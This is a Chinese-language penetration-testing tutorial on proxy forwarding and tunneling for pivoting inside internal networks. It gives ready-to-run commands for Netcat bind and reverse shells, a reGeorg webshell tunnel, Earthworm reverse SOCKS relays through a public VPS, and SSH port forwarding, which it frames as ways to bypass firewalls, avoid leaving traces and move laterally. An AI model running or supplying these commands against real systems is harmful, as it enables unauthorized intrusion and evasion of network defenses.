内网渗透之代理转发
字数 1056 2025-08-15 21:32:49
内网渗透之代理转发技术详解
0x01 前言
内网转发是渗透测试中的关键技术,它允许我们将内网流量代理到本地进行访问,极大地方便了内网横向渗透。直接登录内网服务器进行渗透存在以下问题:
- 权限不足无法直接登录
- 服务器环境变量或组件缺失导致工具无法运行
- 直接操作会留下明显痕迹
因此,通过内网转发在本地操作是最方便且安全的选择。
0x02 代理类型
正向代理(Forward Proxy)
结构:Lhost → proxy → Rhost
特点:
- Proxy和Client同属一个区域
- 对Server透明
- Proxy代替Client访问Rhost
反向代理(Reverse Proxy)
结构:Lhost ↔ proxy ↔ firewall ↔ Rhost
特点:
- Proxy和Server同属一个区域
- 对Client透明
- 用于穿透防火墙限制
简单区分:
- 正向代理客户端
- 反向代理服务端
0x03 Socks协议
Socks协议是代理技术的基础:
- 中文名:防火墙安全会话转换协议
- 工作在OSI第5层(会话层)
- 可穿透防火墙
- 使用TCP协议传输数据
- 不支持ICMP等网络层服务
版本:
- SOCKS4:支持TELNET、FTP、HTTP等TCP协议
- SOCKS5:支持TCP与UDP,支持安全认证方案
0x04 常用工具及技术
Netcat (瑞士军刀)
正向连接:
# 主机A(192.168.153.138)
nc -l -p 5555 -t -e cmd.exe
# 主机B(192.168.153.140)
nc -nvv 192.168.153.138 5555
反向连接:
# 主机B监听
nc -lp 5555
# 主机A反弹
nc -t -e cmd 192.168.153.140 5555
reGeorg + Proxychains
- 上传tunnel.jsp到web主机A
- 主机B运行:
python reGeorgSocksProxy.py -p 1080 -u http://192.168.153.137/tunnel.jsp
- 配置proxychains使用1080端口
注意:nmap需加-sT -Pn参数
Earthworm (EW)
支持多种链路状态:
- ssocksd:正向SOCKS代理
- rcsocks:接收反弹连接
- rssocks:反向SOCKS代理
- lcx_slave/lcx_tran/lcx_listen:建立连接通路
正向SOCKS5服务器
./ew_for_Win.exe -s ssocksd -l 8888
反弹SOCKS5服务器
# 公网主机
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
# 目标主机
./ew_for_Win.exe -s rssocks -d 192.168.153.129 -e 8888
二级网络环境(有公网IP)
# B主机
ew_for_Win.exe -s ssocksd -l 8888
# A主机
ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.153.138 -g 8888
二级网络环境(无公网IP)
# 公网VPS
./ew_for_linux64 -s lcx_listen -l 10800 -e 8888
# B主机
./ew_for_Win.exe -s ssocksd -l 9999
# A主机
./ew_for_Win.exe -s lcx_slave -d 45.xxx.xxx.72 -e 8888 -f 192.168.153.138 -g 9999
SSH隧道
本地转发
ssh -CfNg -L 1234:127.0.0.1:3306 root@45.XX.XX.X21
远程转发
ssh -CfNg -R 81:127.0.0.1:80 root@192.168.153.142
动态转发(SOCKS代理)
ssh -qTfnN -D 1080 root@45.XX.XX.X21
参数说明:
- -C:允许压缩数据
- -q:安静模式
- -T:不占用shell
- -f:后台运行
- -N:不执行远程命令
- -g:允许远端主机连接本地转发端口
- -n:防止从stdin读取数据
总结
内网转发技术是渗透测试中的核心技能,掌握各种代理工具和技术的使用场景及方法,能够有效突破网络限制,实现内网横向移动。根据实际网络环境选择合适的转发方式,是成功渗透的关键。